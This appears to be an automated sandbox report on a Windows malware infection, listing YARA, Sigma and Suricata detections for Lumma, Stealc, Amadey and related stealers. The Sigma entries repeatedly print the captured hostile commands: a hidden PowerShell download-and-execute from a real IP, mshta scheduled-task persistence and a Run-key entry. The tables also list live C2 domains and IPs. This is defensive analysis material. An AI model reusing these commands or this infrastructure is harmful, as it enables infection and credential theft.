28.0.ce4pMzk.exe.21039bd0000.0.unpack	JoeSecurity_LiteHTTPBot	Yara detected LiteHTTP Bot	Joe Security
28.0.ce4pMzk.exe.21039bd0000.0.unpack	MALWARE_Win_CoreBot	Detects CoreBot	ditekSHen	0x8fa0:$v1_1: newtask 0x7c45:$v1_7: DownloadFile 0x8f22:$cnc1: &os= 0x8f2c:$cnc2: &pv= 0x8f36:$cnc3: &ip= 0x8f40:$cnc4: &cn= 0x8f4a:$cnc5: &lr= 0x8f54:$cnc6: &ct= 0x8f5e:$cnc7: &bv= 0x8fb0:$cnc8: &op= 0x8fbe:$cnc9: &td= 0x8fd2:$cnc10: &uni=
33.0.zY9sqWs.exe.f50000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
64.2.df7baf8347.exe.de18000.1.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
64.2.df7baf8347.exe.e092000.6.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
64.2.df7baf8347.exe.de70000.2.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
Click to see the 9 entries

Other

Source	Rule	Description	Author
amsi32_3152.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_7184.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_1720.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_6768.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_7488.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_5992.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\5c9465cda4.exe", ParentImage: C:\Users\user\Desktop\5c9465cda4.exe, ParentProcessId: 1272, ParentProcessName: 5c9465cda4.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 5100, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 7460, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\48dbed8457.exe

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4080, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 3152, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\5c9465cda4.exe", ParentImage: C:\Users\user\Desktop\5c9465cda4.exe, ParentProcessId: 1272, ParentProcessName: 5c9465cda4.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta, ProcessId: 4080, ProcessName: mshta.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4080, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 3152, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\5c9465cda4.exe", ParentImage: C:\Users\user\Desktop\5c9465cda4.exe, ParentProcessId: 1272, ParentProcessName: 5c9465cda4.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta, ProcessId: 4080, ProcessName: mshta.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 7460, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\48dbed8457.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3152, TargetFilename: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4080, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 3152, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5100, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 3740, ProcessName: schtasks.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4080, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 3152, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4080, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 3152, ProcessName: powershell.exe

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 6176, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Powershell download and execute file

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4080, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 3152, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T21:59:08.388209+0100	2028371	3	Unknown Traffic	192.168.2.4	50031	104.21.16.1	443	TCP
2025-03-05T22:01:02.247455+0100	2028371	3	Unknown Traffic	192.168.2.4	49856	104.21.96.1	443	TCP
2025-03-05T22:01:05.320575+0100	2028371	3	Unknown Traffic	192.168.2.4	49863	104.21.96.1	443	TCP
2025-03-05T22:01:09.027956+0100	2028371	3	Unknown Traffic	192.168.2.4	49877	104.21.96.1	443	TCP
2025-03-05T22:01:12.702508+0100	2028371	3	Unknown Traffic	192.168.2.4	49888	104.21.96.1	443	TCP
2025-03-05T22:01:15.914708+0100	2028371	3	Unknown Traffic	192.168.2.4	49898	104.21.96.1	443	TCP
2025-03-05T22:01:20.681775+0100	2028371	3	Unknown Traffic	192.168.2.4	49906	104.21.96.1	443	TCP
2025-03-05T22:01:20.735428+0100	2028371	3	Unknown Traffic	192.168.2.4	49905	104.73.234.102	443	TCP
2025-03-05T22:01:23.978450+0100	2028371	3	Unknown Traffic	192.168.2.4	49915	104.21.24.225	443	TCP
2025-03-05T22:01:25.547212+0100	2028371	3	Unknown Traffic	192.168.2.4	49918	104.21.96.1	443	TCP
2025-03-05T22:01:27.451359+0100	2028371	3	Unknown Traffic	192.168.2.4	49925	104.21.24.225	443	TCP
2025-03-05T22:01:31.085674+0100	2028371	3	Unknown Traffic	192.168.2.4	49933	104.21.24.225	443	TCP
2025-03-05T22:01:31.301735+0100	2028371	3	Unknown Traffic	192.168.2.4	49938	104.21.96.1	443	TCP
2025-03-05T22:01:33.603611+0100	2028371	3	Unknown Traffic	192.168.2.4	49943	104.21.16.1	443	TCP
2025-03-05T22:01:34.206333+0100	2028371	3	Unknown Traffic	192.168.2.4	49948	104.21.24.225	443	TCP
2025-03-05T22:01:37.248543+0100	2028371	3	Unknown Traffic	192.168.2.4	49956	104.21.24.225	443	TCP
2025-03-05T22:01:37.913347+0100	2028371	3	Unknown Traffic	192.168.2.4	49957	104.21.16.1	443	TCP
2025-03-05T22:01:40.787626+0100	2028371	3	Unknown Traffic	192.168.2.4	49962	104.21.24.225	443	TCP
2025-03-05T22:01:41.536332+0100	2028371	3	Unknown Traffic	192.168.2.4	49967	104.21.16.1	443	TCP
2025-03-05T22:01:44.510660+0100	2028371	3	Unknown Traffic	192.168.2.4	49975	104.21.24.225	443	TCP
2025-03-05T22:01:45.967330+0100	2028371	3	Unknown Traffic	192.168.2.4	49983	104.21.16.1	443	TCP
2025-03-05T22:01:46.913621+0100	2028371	3	Unknown Traffic	192.168.2.4	49984	104.21.16.1	443	TCP
2025-03-05T22:01:50.184781+0100	2028371	3	Unknown Traffic	192.168.2.4	49991	104.21.16.1	443	TCP
2025-03-05T22:01:50.666985+0100	2028371	3	Unknown Traffic	192.168.2.4	49996	104.21.16.1	443	TCP
2025-03-05T22:01:50.931843+0100	2028371	3	Unknown Traffic	192.168.2.4	50000	104.21.24.225	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:02.992763+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49856	104.21.96.1	443	TCP
2025-03-05T22:01:06.636131+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49863	104.21.96.1	443	TCP
2025-03-05T22:01:25.310208+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49915	104.21.24.225	443	TCP
2025-03-05T22:01:28.785247+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49925	104.21.24.225	443	TCP
2025-03-05T22:01:32.201071+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49938	104.21.96.1	443	TCP
2025-03-05T22:01:35.597852+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49943	104.21.16.1	443	TCP
2025-03-05T22:01:38.956222+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49957	104.21.16.1	443	TCP
2025-03-05T22:01:48.536687+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49984	104.21.16.1	443	TCP
2025-03-05T22:01:51.878480+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50000	104.21.24.225	443	TCP
2025-03-05T22:01:52.265693+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49996	104.21.16.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:02.992763+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49856	104.21.96.1	443	TCP
2025-03-05T22:01:25.310208+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49915	104.21.24.225	443	TCP
2025-03-05T22:01:35.597852+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49943	104.21.16.1	443	TCP
2025-03-05T22:01:48.536687+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49984	104.21.16.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:02.247455+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.4	49856	104.21.96.1	443	TCP
2025-03-05T22:01:05.320575+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.4	49863	104.21.96.1	443	TCP
2025-03-05T22:01:09.027956+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.4	49877	104.21.96.1	443	TCP
2025-03-05T22:01:12.702508+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.4	49888	104.21.96.1	443	TCP
2025-03-05T22:01:15.914708+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.4	49898	104.21.96.1	443	TCP
2025-03-05T22:01:20.681775+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.4	49906	104.21.96.1	443	TCP
2025-03-05T22:01:25.547212+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.4	49918	104.21.96.1	443	TCP
2025-03-05T22:01:31.301735+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.4	49938	104.21.96.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (collapimga .fun)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:17.337982+0100	2060410	1	Domain Observed Used for C2 Detected	192.168.2.4	60174	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (earthsymphzony .today)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:17.543611+0100	2060412	1	Domain Observed Used for C2 Detected	192.168.2.4	56871	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exarthynature .run)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:00.447817+0100	2060385	1	Domain Observed Used for C2 Detected	192.168.2.4	54485	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (foresctwhispers .top)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:17.152350+0100	2060414	1	Domain Observed Used for C2 Detected	192.168.2.4	64912	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (quietswtreams .life)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:17.379243+0100	2060416	1	Domain Observed Used for C2 Detected	192.168.2.4	53002	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seizedsentec .online)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:17.351244+0100	2060418	1	Domain Observed Used for C2 Detected	192.168.2.4	60274	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (starrynsightsky .icu)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:17.532878+0100	2060420	1	Domain Observed Used for C2 Detected	192.168.2.4	60009	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strawpeasaen .fun)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:17.367235+0100	2060422	1	Domain Observed Used for C2 Detected	192.168.2.4	49461	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tracnquilforest .life)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:17.327250+0100	2060424	1	Domain Observed Used for C2 Detected	192.168.2.4	51887	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:39.891047+0100	2044245	1	Malware Command and Control Activity Detected	45.93.20.28	80	192.168.2.4	49965	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:39.883664+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49965	45.93.20.28	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:40.117331+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49965	45.93.20.28	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:41.239379+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49965	45.93.20.28	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:40.124688+0100	2044247	1	Malware Command and Control Activity Detected	45.93.20.28	80	192.168.2.4	49965	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:17.527607+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49898	104.21.96.1	443	TCP
2025-03-05T22:01:35.259445+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49948	104.21.24.225	443	TCP
2025-03-05T22:01:43.996579+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49967	104.21.16.1	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:01:39.651409+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49965	45.93.20.28	80	TCP

ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:00:33.277114+0100	2800029	1	Attempted User Privilege Gain	176.113.115.7	80	192.168.2.4	49798	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T22:00:07.325253+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49739	176.113.115.6	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
